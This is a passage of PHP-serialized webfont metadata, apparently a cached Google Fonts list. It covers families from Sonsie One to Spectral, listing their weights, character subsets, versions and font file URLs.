One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:76:\"http://fonts.gstatic.com/s/sonsieone/v21/PbymFmP_EAnPqbKaoc18YVu80lbp8JM.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1279;O:8:\"stdClass\":8:{s:6:\"family\";s:4:\"Sora\";s:8:\"variants\";a:8:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v11\";s:12:\"lastModified\";s:10:\"2022-08-24\";s:5:\"files\";O:8:\"stdClass\":8:{s:3:\"100\";s:80:\"http://fonts.gstatic.com/s/sora/v11/xMQOuFFYT72X5wkB_18qmnndmSdSn3-KIwNhBti0.ttf\";s:3:\"200\";s:80:\"http://fonts.gstatic.com/s/sora/v11/xMQOuFFYT72X5wkB_18qmnndmSfSnn-KIwNhBti0.ttf\";s:3:\"300\";s:80:\"http://fonts.gstatic.com/s/sora/v11/xMQOuFFYT72X5wkB_18qmnndmScMnn-KIwNhBti0.ttf\";s:7:\"regular\";s:80:\"http://fonts.gstatic.com/s/sora/v11/xMQOuFFYT72X5wkB_18qmnndmSdSnn-KIwNhBti0.ttf\";s:3:\"500\";s:80:\"http://fonts.gstatic.com/s/sora/v11/xMQOuFFYT72X5wkB_18qmnndmSdgnn-KIwNhBti0.ttf\";s:3:\"600\";s:80:\"http://fonts.gstatic.com/s/sora/v11/xMQOuFFYT72X5wkB_18qmnndmSeMmX-KIwNhBti0.ttf\";s:3:\"700\";s:80:\"http://fonts.gstatic.com/s/sora/v11/xMQOuFFYT72X5wkB_18qmnndmSe1mX-KIwNhBti0.ttf\";s:3:\"800\";s:80:\"http://fonts.gstatic.com/s/sora/v11/xMQOuFFYT72X5wkB_18qmnndmSfSmX-KIwNhBti0.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1280;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Sorts Mill Goudy\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:89:\"http://fonts.gstatic.com/s/sortsmillgoudy/v15/Qw3GZR9MED_6PSuS_50nEaVrfzgEXH0OjpM75PE.ttf\";s:6:\"italic\";s:92:\"http://fonts.gstatic.com/s/sortsmillgoudy/v15/Qw3AZR9MED_6PSuS_50nEaVrfzgEbH8EirE-9PGLfQ.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1281;O:8:\"stdClass\":8:{s:6:\"family\";s:15:\"Source Code Pro\";s:8:\"variants\";a:16:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:7:\"regular\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:9:\"200italic\";i:9;s:9:\"300italic\";i:10;s:6:\"italic\";i:11;s:9:\"500italic\";i:12;s:9:\"600italic\";i:13;s:9:\"700italic\";i:14;s:9:\"800italic\";i:15;s:9:\"900italic\";}s:7:\"subsets\";a:7:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:9:\"greek-ext\";i:4;s:5:\"latin\";i:5;s:9:\"latin-ext\";i:6;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v22\";s:12:\"lastModified\";s:10:\"2022-08-24\";s:5:\"files\";O:8:\"stdClass\":16:{s:3:\"200\";s:104:\"http://fonts.gstatic.com/s/sourcecodepro/v22/HI_diYsKILxRpg3hIP6sJ7fM7PqPMcMnZFqUwX28DEyQhM5hTXUcdJg.ttf\";s:3:\"300\";s:104:\"http://fonts.gstatic.com/s/sourcecodepro/v22/HI_diYsKILxRpg3hIP6sJ7fM7PqPMcMnZFqUwX28DJKQhM5hTXUcdJg.ttf\";s:7:\"regular\";s:104:\"http://fonts.gstatic.com/s/sourcecodepro/v22/HI_diYsKILxRpg3hIP6sJ7fM7PqPMcMnZFqUwX28DMyQhM5hTXUcdJg.ttf\";s:3:\"500\";s:104:\"http://fonts.gstatic.com/s/sourcecodepro/v22/HI_diYsKILxRpg3hIP6sJ7fM7PqPMcMnZFqUwX28DP6QhM5hTXUcdJg.ttf\";s:3:\"600\";s:104:\"http://fonts.gstatic.com/s/sourcecodepro/v22/HI_diYsKILxRpg3hIP6sJ7fM7PqPMcMnZFqUwX28DBKXhM5hTXUcdJg.ttf\";s:3:\"700\";s:104:\"http://fonts.gstatic.com/s/sourcecodepro/v22/HI_diYsKILxRpg3hIP6sJ7fM7PqPMcMnZFqUwX28DCuXhM5hTXUcdJg.ttf\";s:3:\"800\";s:104:\"http://fonts.gstatic.com/s/sourcecodepro/v22/HI_diYsKILxRpg3hIP6sJ7fM7PqPMcMnZFqUwX28DEyXhM5hTXUcdJg.ttf\";s:3:\"900\";s:104:\"http://fonts.gstatic.com/s/sourcecodepro/v22/HI_diYsKILxRpg3hIP6sJ7fM7PqPMcMnZFqUwX28DGWXhM5hTXUcdJg.ttf\";s:9:\"200italic\";s:107:\"http://fonts.gstatic.com/s/sourcecodepro/v22/HI_jiYsKILxRpg3hIP6sJ7fM7PqlOPHYvDP_W9O7GQTT7I1rSVcZZJiGpw.ttf\";s:9:\"300italic\";s:107:\"http://fonts.gstatic.com/s/sourcecodepro/v22/HI_jiYsKILxRpg3hIP6sJ7fM7PqlOPHYvDP_W9O7GQTTMo1rSVcZZJiGpw.ttf\";s:6:\"italic\";s:107:\"http://fonts.gstatic.com/s/sourcecodepro/v22/HI_jiYsKILxRpg3hIP6sJ7fM7PqlOPHYvDP_W9O7GQTTbI1rSVcZZJiGpw.ttf\";s:9:\"500italic\";s:107:\"http://fonts.gstatic.com/s/sourcecodepro/v22/HI_jiYsKILxRpg3hIP6sJ7fM7PqlOPHYvDP_W9O7GQTTXo1rSVcZZJiGpw.ttf\";s:9:\"600italic\";s:107:\"http://fonts.gstatic.com/s/sourcecodepro/v22/HI_jiYsKILxRpg3hIP6sJ7fM7PqlOPHYvDP_W9O7GQTTsoprSVcZZJiGpw.ttf\";s:9:\"700italic\";s:107:\"http://fonts.gstatic.com/s/sourcecodepro/v22/HI_jiYsKILxRpg3hIP6sJ7fM7PqlOPHYvDP_W9O7GQTTi4prSVcZZJiGpw.ttf\";s:9:\"800italic\";s:107:\"http://fonts.gstatic.com/s/sourcecodepro/v22/HI_jiYsKILxRpg3hIP6sJ7fM7PqlOPHYvDP_W9O7GQTT7IprSVcZZJiGpw.ttf\";s:9:\"900italic\";s:107:\"http://fonts.gstatic.com/s/sourcecodepro/v22/HI_jiYsKILxRpg3hIP6sJ7fM7PqlOPHYvDP_W9O7GQTTxYprSVcZZJiGpw.ttf\";}s:8:\"category\";s:9:\"monospace\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1282;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"Source Sans 3\";s:8:\"variants\";a:16:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:7:\"regular\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:9:\"200italic\";i:9;s:9:\"300italic\";i:10;s:6:\"italic\";i:11;s:9:\"500italic\";i:12;s:9:\"600italic\";i:13;s:9:\"700italic\";i:14;s:9:\"800italic\";i:15;s:9:\"900italic\";}s:7:\"subsets\";a:7:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:9:\"greek-ext\";i:4;s:5:\"latin\";i:5;s:9:\"latin-ext\";i:6;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v8\";s:12:\"lastModified\";s:10:\"2022-06-01\";s:5:\"files\";O:8:\"stdClass\":16:{s:3:\"200\";s:98:\"http://fonts.gstatic.com/s/sourcesans3/v8/nwpBtKy2OAdR1K-IwhWudF-R9QMylBJAV3Bo8Kw461EN_io6npfB.ttf\";s:3:\"300\";s:98:\"http://fonts.gstatic.com/s/sourcesans3/v8/nwpBtKy2OAdR1K-IwhWudF-R9QMylBJAV3Bo8Kzm61EN_io6npfB.ttf\";s:7:\"regular\";s:98:\"http://fonts.gstatic.com/s/sourcesans3/v8/nwpBtKy2OAdR1K-IwhWudF-R9QMylBJAV3Bo8Ky461EN_io6npfB.ttf\";s:3:\"500\";s:98:\"http://fonts.gstatic.com/s/sourcesans3/v8/nwpBtKy2OAdR1K-IwhWudF-R9QMylBJAV3Bo8KyK61EN_io6npfB.ttf\";s:3:\"600\";s:98:\"http://fonts.gstatic.com/s/sourcesans3/v8/nwpBtKy2OAdR1K-IwhWudF-R9QMylBJAV3Bo8Kxm7FEN_io6npfB.ttf\";s:3:\"700\";s:98:\"http://fonts.gstatic.com/s/sourcesans3/v8/nwpBtKy2OAdR1K-IwhWudF-R9QMylBJAV3Bo8Kxf7FEN_io6npfB.ttf\";s:3:\"800\";s:98:\"http://fonts.gstatic.com/s/sourcesans3/v8/nwpBtKy2OAdR1K-IwhWudF-R9QMylBJAV3Bo8Kw47FEN_io6npfB.ttf\";s:3:\"900\";s:98:\"http://fonts.gstatic.com/s/sourcesans3/v8/nwpBtKy2OAdR1K-IwhWudF-R9QMylBJAV3Bo8KwR7FEN_io6npfB.ttf\";s:9:\"200italic\";s:101:\"http://fonts.gstatic.com/s/sourcesans3/v8/nwpDtKy2OAdR1K-IwhWudF-R3woAa8opPOrG97lwqDlO9C4Ym4fB3Ts.ttf\";s:9:\"300italic\";s:101:\"http://fonts.gstatic.com/s/sourcesans3/v8/nwpDtKy2OAdR1K-IwhWudF-R3woAa8opPOrG97lwqOdO9C4Ym4fB3Ts.ttf\";s:6:\"italic\";s:101:\"http://fonts.gstatic.com/s/sourcesans3/v8/nwpDtKy2OAdR1K-IwhWudF-R3woAa8opPOrG97lwqLlO9C4Ym4fB3Ts.ttf\";s:9:\"500italic\";s:101:\"http://fonts.gstatic.com/s/sourcesans3/v8/nwpDtKy2OAdR1K-IwhWudF-R3woAa8opPOrG97lwqItO9C4Ym4fB3Ts.ttf\";s:9:\"600italic\";s:101:\"http://fonts.gstatic.com/s/sourcesans3/v8/nwpDtKy2OAdR1K-IwhWudF-R3woAa8opPOrG97lwqGdJ9C4Ym4fB3Ts.ttf\";s:9:\"700italic\";s:101:\"http://fonts.gstatic.com/s/sourcesans3/v8/nwpDtKy2OAdR1K-IwhWudF-R3woAa8opPOrG97lwqF5J9C4Ym4fB3Ts.ttf\";s:9:\"800italic\";s:101:\"http://fonts.gstatic.com/s/sourcesans3/v8/nwpDtKy2OAdR1K-IwhWudF-R3woAa8opPOrG97lwqDlJ9C4Ym4fB3Ts.ttf\";s:9:\"900italic\";s:101:\"http://fonts.gstatic.com/s/sourcesans3/v8/nwpDtKy2OAdR1K-IwhWudF-R3woAa8opPOrG97lwqBBJ9C4Ym4fB3Ts.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1283;O:8:\"stdClass\":8:{s:6:\"family\";s:15:\"Source Sans Pro\";s:8:\"variants\";a:12:{i:0;s:3:\"200\";i:1;s:9:\"200italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:7:\"regular\";i:5;s:6:\"italic\";i:6;s:3:\"600\";i:7;s:9:\"600italic\";i:8;s:3:\"700\";i:9;s:9:\"700italic\";i:10;s:3:\"900\";i:11;s:9:\"900italic\";}s:7:\"subsets\";a:7:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:9:\"greek-ext\";i:4;s:5:\"latin\";i:5;s:9:\"latin-ext\";i:6;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":12:{s:3:\"200\";s:91:\"http://fonts.gstatic.com/s/sourcesanspro/v21/6xKydSBYKcSV-LCoeQqfX1RYOo3i94_AkB1v_8CGxg.ttf\";s:9:\"200italic\";s:93:\"http://fonts.gstatic.com/s/sourcesanspro/v21/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZYokRdr3cWWxg40.ttf\";s:3:\"300\";s:91:\"http://fonts.gstatic.com/s/sourcesanspro/v21/6xKydSBYKcSV-LCoeQqfX1RYOo3ik4zAkB1v_8CGxg.ttf\";s:9:\"300italic\";s:93:\"http://fonts.gstatic.com/s/sourcesanspro/v21/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZZMkhdr3cWWxg40.ttf\";s:7:\"regular\";s:87:\"http://fonts.gstatic.com/s/sourcesanspro/v21/6xK3dSBYKcSV-LCoeQqfX1RYOo3aP6TkmDZz9g.ttf\";s:6:\"italic\";s:89:\"http://fonts.gstatic.com/s/sourcesanspro/v21/6xK1dSBYKcSV-LCoeQqfX1RYOo3qPa7gujNj9tmf.ttf\";s:3:\"600\";s:91:\"http://fonts.gstatic.com/s/sourcesanspro/v21/6xKydSBYKcSV-LCoeQqfX1RYOo3i54rAkB1v_8CGxg.ttf\";s:9:\"600italic\";s:93:\"http://fonts.gstatic.com/s/sourcesanspro/v21/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZY4lBdr3cWWxg40.ttf\";s:3:\"700\";s:91:\"http://fonts.gstatic.com/s/sourcesanspro/v21/6xKydSBYKcSV-LCoeQqfX1RYOo3ig4vAkB1v_8CGxg.ttf\";s:9:\"700italic\";s:93:\"http://fonts.gstatic.com/s/sourcesanspro/v21/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZZclRdr3cWWxg40.ttf\";s:3:\"900\";s:91:\"http://fonts.gstatic.com/s/sourcesanspro/v21/6xKydSBYKcSV-LCoeQqfX1RYOo3iu4nAkB1v_8CGxg.ttf\";s:9:\"900italic\";s:93:\"http://fonts.gstatic.com/s/sourcesanspro/v21/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZZklxdr3cWWxg40.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1284;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"Source Serif 4\";s:8:\"variants\";a:16:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:7:\"regular\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:9:\"200italic\";i:9;s:9:\"300italic\";i:10;s:6:\"italic\";i:11;s:9:\"500italic\";i:12;s:9:\"600italic\";i:13;s:9:\"700italic\";i:14;s:9:\"800italic\";i:15;s:9:\"900italic\";}s:7:\"subsets\";a:6:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:5:\"latin\";i:4;s:9:\"latin-ext\";i:5;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v7\";s:12:\"lastModified\";s:10:\"2022-08-24\";s:5:\"files\";O:8:\"stdClass\":16:{s:3:\"200\";s:118:\"http://fonts.gstatic.com/s/sourceserif4/v7/vEFy2_tTDB4M7-auWDN0ahZJW3IX2ih5nk3AucvUHf6OAVIJmeUDygwjipdqrhxXD-wGvjU.ttf\";s:3:\"300\";s:118:\"http://fonts.gstatic.com/s/sourceserif4/v7/vEFy2_tTDB4M7-auWDN0ahZJW3IX2ih5nk3AucvUHf6OAVIJmeUDygwjiklqrhxXD-wGvjU.ttf\";s:7:\"regular\";s:118:\"http://fonts.gstatic.com/s/sourceserif4/v7/vEFy2_tTDB4M7-auWDN0ahZJW3IX2ih5nk3AucvUHf6OAVIJmeUDygwjihdqrhxXD-wGvjU.ttf\";s:3:\"500\";s:118:\"http://fonts.gstatic.com/s/sourceserif4/v7/vEFy2_tTDB4M7-auWDN0ahZJW3IX2ih5nk3AucvUHf6OAVIJmeUDygwjiiVqrhxXD-wGvjU.ttf\";s:3:\"600\";s:118:\"http://fonts.gstatic.com/s/sourceserif4/v7/vEFy2_tTDB4M7-auWDN0ahZJW3IX2ih5nk3AucvUHf6OAVIJmeUDygwjisltrhxXD-wGvjU.ttf\";s:3:\"700\";s:118:\"http://fonts.gstatic.com/s/sourceserif4/v7/vEFy2_tTDB4M7-auWDN0ahZJW3IX2ih5nk3AucvUHf6OAVIJmeUDygwjivBtrhxXD-wGvjU.ttf\";s:3:\"800\";s:118:\"http://fonts.gstatic.com/s/sourceserif4/v7/vEFy2_tTDB4M7-auWDN0ahZJW3IX2ih5nk3AucvUHf6OAVIJmeUDygwjipdtrhxXD-wGvjU.ttf\";s:3:\"900\";s:118:\"http://fonts.gstatic.com/s/sourceserif4/v7/vEFy2_tTDB4M7-auWDN0ahZJW3IX2ih5nk3AucvUHf6OAVIJmeUDygwjir5trhxXD-wGvjU.ttf\";s:9:\"200italic\";s:121:\"http://fonts.gstatic.com/s/sourceserif4/v7/vEF02_tTDB4M7-auWDN0ahZJW1ge6NmXpVAHV83Bfb_US2D2QYxoUKIkn98pxl9dC84DrjXEXw.ttf\";s:9:\"300italic\";s:121:\"http://fonts.gstatic.com/s/sourceserif4/v7/vEF02_tTDB4M7-auWDN0ahZJW1ge6NmXpVAHV83Bfb_US2D2QYxoUKIkn98pGF9dC84DrjXEXw.ttf\";s:6:\"italic\";s:121:\"http://fonts.gstatic.com/s/sourceserif4/v7/vEF02_tTDB4M7-auWDN0ahZJW1ge6NmXpVAHV83Bfb_US2D2QYxoUKIkn98pRl9dC84DrjXEXw.ttf\";s:9:\"500italic\";s:121:\"http://fonts.gstatic.com/s/sourceserif4/v7/vEF02_tTDB4M7-auWDN0ahZJW1ge6NmXpVAHV83Bfb_US2D2QYxoUKIkn98pdF9dC84DrjXEXw.ttf\";s:9:\"600italic\";s:121:\"http://fonts.gstatic.com/s/sourceserif4/v7/vEF02_tTDB4M7-auWDN0ahZJW1ge6NmXpVAHV83Bfb_US2D2QYxoUKIkn98pmFhdC84DrjXEXw.ttf\";s:9:\"700italic\";s:121:\"http://fonts.gstatic.com/s/sourceserif4/v7/vEF02_tTDB4M7-auWDN0ahZJW1ge6NmXpVAHV83Bfb_US2D2QYxoUKIkn98poVhdC84DrjXEXw.ttf\";s:9:\"800italic\";s:121:\"http://fonts.gstatic.com/s/sourceserif4/v7/vEF02_tTDB4M7-auWDN0ahZJW1ge6NmXpVAHV83Bfb_US2D2QYxoUKIkn98pxlhdC84DrjXEXw.ttf\";s:9:\"900italic\";s:121:\"http://fonts.gstatic.com/s/sourceserif4/v7/vEF02_tTDB4M7-auWDN0ahZJW1ge6NmXpVAHV83Bfb_US2D2QYxoUKIkn98p71hdC84DrjXEXw.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1285;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Source Serif Pro\";s:8:\"variants\";a:12:{i:0;s:3:\"200\";i:1;s:9:\"200italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:7:\"regular\";i:5;s:6:\"italic\";i:6;s:3:\"600\";i:7;s:9:\"600italic\";i:8;s:3:\"700\";i:9;s:9:\"700italic\";i:10;s:3:\"900\";i:11;s:9:\"900italic\";}s:7:\"subsets\";a:6:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:5:\"latin\";i:4;s:9:\"latin-ext\";i:5;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":12:{s:3:\"200\";s:93:\"http://fonts.gstatic.com/s/sourceserifpro/v15/neIXzD-0qpwxpaWvjeD0X88SAOeasbsfhSugxYUvZrI.ttf\";s:9:\"200italic\";s:96:\"http://fonts.gstatic.com/s/sourceserifpro/v15/neIVzD-0qpwxpaWvjeD0X88SAOeauXEGbSqqwacqdrKvbQ.ttf\";s:3:\"300\";s:93:\"http://fonts.gstatic.com/s/sourceserifpro/v15/neIXzD-0qpwxpaWvjeD0X88SAOeasd8chSugxYUvZrI.ttf\";s:9:\"300italic\";s:96:\"http://fonts.gstatic.com/s/sourceserifpro/v15/neIVzD-0qpwxpaWvjeD0X88SAOeauXEGCSmqwacqdrKvbQ.ttf\";s:7:\"regular\";s:89:\"http://fonts.gstatic.com/s/sourceserifpro/v15/neIQzD-0qpwxpaWvjeD0X88SAOeaiXM0oSOL2Yw.ttf\";s:6:\"italic\";s:92:\"http://fonts.gstatic.com/s/sourceserifpro/v15/neIWzD-0qpwxpaWvjeD0X88SAOeauXE-pQGOyYw2fw.ttf\";s:3:\"600\";s:93:\"http://fonts.gstatic.com/s/sourceserifpro/v15/neIXzD-0qpwxpaWvjeD0X88SAOeasasahSugxYUvZrI.ttf\";s:9:\"600italic\";s:96:\"http://fonts.gstatic.com/s/sourceserifpro/v15/neIVzD-0qpwxpaWvjeD0X88SAOeauXEGfS-qwacqdrKvbQ.ttf\";s:3:\"700\";s:93:\"http://fonts.gstatic.com/s/sourceserifpro/v15/neIXzD-0qpwxpaWvjeD0X88SAOeasc8bhSugxYUvZrI.ttf\";s:9:\"700italic\";s:96:\"http://fonts.gstatic.com/s/sourceserifpro/v15/neIVzD-0qpwxpaWvjeD0X88SAOeauXEGGS6qwacqdrKvbQ.ttf\";s:3:\"900\";s:93:\"http://fonts.gstatic.com/s/sourceserifpro/v15/neIXzD-0qpwxpaWvjeD0X88SAOeasfcZhSugxYUvZrI.ttf\";s:9:\"900italic\";s:96:\"http://fonts.gstatic.com/s/sourceserifpro/v15/neIVzD-0qpwxpaWvjeD0X88SAOeauXEGISyqwacqdrKvbQ.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1286;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"Space Grotesk\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-08-24\";s:5:\"files\";O:8:\"stdClass\":5:{s:3:\"300\";s:100:\"http://fonts.gstatic.com/s/spacegrotesk/v13/V8mQoQDjQSkFtoMM3T6r8E7mF71Q-gOoraIAEj62UUsjNsFjTDJK.ttf\";s:7:\"regular\";s:100:\"http://fonts.gstatic.com/s/spacegrotesk/v13/V8mQoQDjQSkFtoMM3T6r8E7mF71Q-gOoraIAEj7oUUsjNsFjTDJK.ttf\";s:3:\"500\";s:100:\"http://fonts.gstatic.com/s/spacegrotesk/v13/V8mQoQDjQSkFtoMM3T6r8E7mF71Q-gOoraIAEj7aUUsjNsFjTDJK.ttf\";s:3:\"600\";s:100:\"http://fonts.gstatic.com/s/spacegrotesk/v13/V8mQoQDjQSkFtoMM3T6r8E7mF71Q-gOoraIAEj42VksjNsFjTDJK.ttf\";s:3:\"700\";s:100:\"http://fonts.gstatic.com/s/spacegrotesk/v13/V8mQoQDjQSkFtoMM3T6r8E7mF71Q-gOoraIAEj4PVksjNsFjTDJK.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1287;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Space Mono\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v12\";s:12:\"lastModified\";s:10:\"2022-08-31\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:76:\"http://fonts.gstatic.com/s/spacemono/v12/i7dPIFZifjKcF5UAWdDRUEZ2RFq7AwU.ttf\";s:6:\"italic\";s:79:\"http://fonts.gstatic.com/s/spacemono/v12/i7dNIFZifjKcF5UAWdDRYER8QHi-EwWMbg.ttf\";s:3:\"700\";s:80:\"http://fonts.gstatic.com/s/spacemono/v12/i7dMIFZifjKcF5UAWdDRaPpZYFKQHwyVd3U.ttf\";s:9:\"700italic\";s:83:\"http://fonts.gstatic.com/s/spacemono/v12/i7dSIFZifjKcF5UAWdDRYERE_FeaGy6QZ3WfYg.ttf\";}s:8:\"category\";s:9:\"monospace\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1288;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"Special Elite\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:83:\"http://fonts.gstatic.com/s/specialelite/v18/XLYgIZbkc4JPUL5CVArUVL0nhncESXFtUsM.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1289;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Spectral\";s:8:\"variants\";a:14:{i:0;s:3:\"200\";i:1;s:9:\"200italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:7:\"regular\";i:5;s:6:\"italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";}s:7:\"subsets\";a:4:{i:0;s:8:\"cyrillic\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-08-31\";s:5:\"files\";O:8:\"stdClass\":14:{s:3:\"200\";s:76:\"http://fonts.gstatic.com/s/spectral/v13/rnCs-xNNww_2s0amA9v2s13GY_etWWIJ.ttf\";s:9:\"200italic\";s:79:\"http://fonts.gstatic.com/s/spectral/v13/rnCu-xNNww_2s0amA9M8qrXHafOPXHIJErY.ttf\";s:3:\"300\";s:76:\"http://fonts.gstatic.com/s/spectral/v13/rnCs-xNNww_2s0amA9uSsF3GY_etWWIJ.ttf\";s:9:\"300italic\";s:79:\"http://fonts.gstatic.com/s/spectral/v13/rnCu-xNNww_2s0amA9M8qtHEafOPXHIJErY.ttf\";s:7:\"regular\";s:72:\"http://fonts.gstatic.com/s/spectral/v13/rnCr-xNNww_2s0amA-M-mHnOSOuk.ttf\";s:6:\"italic\";s:75:\"http://fonts.gstatic.com/s/spectral/v13/rnCt-xNNww_2s0amA9M8kn3sTfukQHs.ttf\";s:3:\"500\";s:76:\"http://fonts.gstatic.com/s/spectral/v13/rnCs-xNNww_2s0amA9vKsV3GY_etWWIJ.ttf\";s:9:\"500italic\";s:79:\"http://fonts.gstatic.com/s/spectral/v13/rnCu-xNNww_2s0amA9M8qonFafOPXHIJErY.ttf\";s:3:\"600\";s:76:\"http://fonts.gstatic.com/s/spectral/v13/rnCs-xNNww_2s0amA9vmtl3GY_etWWIJ.ttf\";s:9:\"600italic\";s:79:\"http://fonts.gstatic.com/s/spectral/v13/rnCu-xNNww_2s0amA9M8qqXCafOPXHIJErY.ttf\";s:3:\"700\";s:76:\"http://fonts.gstatic.com/s/spectral/v13/rnCs-xNNww_2s0amA9uCt13GY_etWWIJ.ttf\";s:9:\"700italic\";s:79:\"http://fonts.gstatic.com/s/spectral/v13/rnCu-xNNww_2s0amA9M8qsHDafOPXHIJErY.ttf\";s:3:\"800\";s:76:\"http://fonts.gstatic.com/s/spectral/v13/rnCs-xNNww_2s0amA9uetF3GY_etWWIJ.ttf\";s:9:\"800italic\";s:79:\"http://fonts.gstatic.com/s/spectral/v13/rnCu-xNNww_2s0amA9M8qt3AafOPXHIJErY.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1290;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Spectral 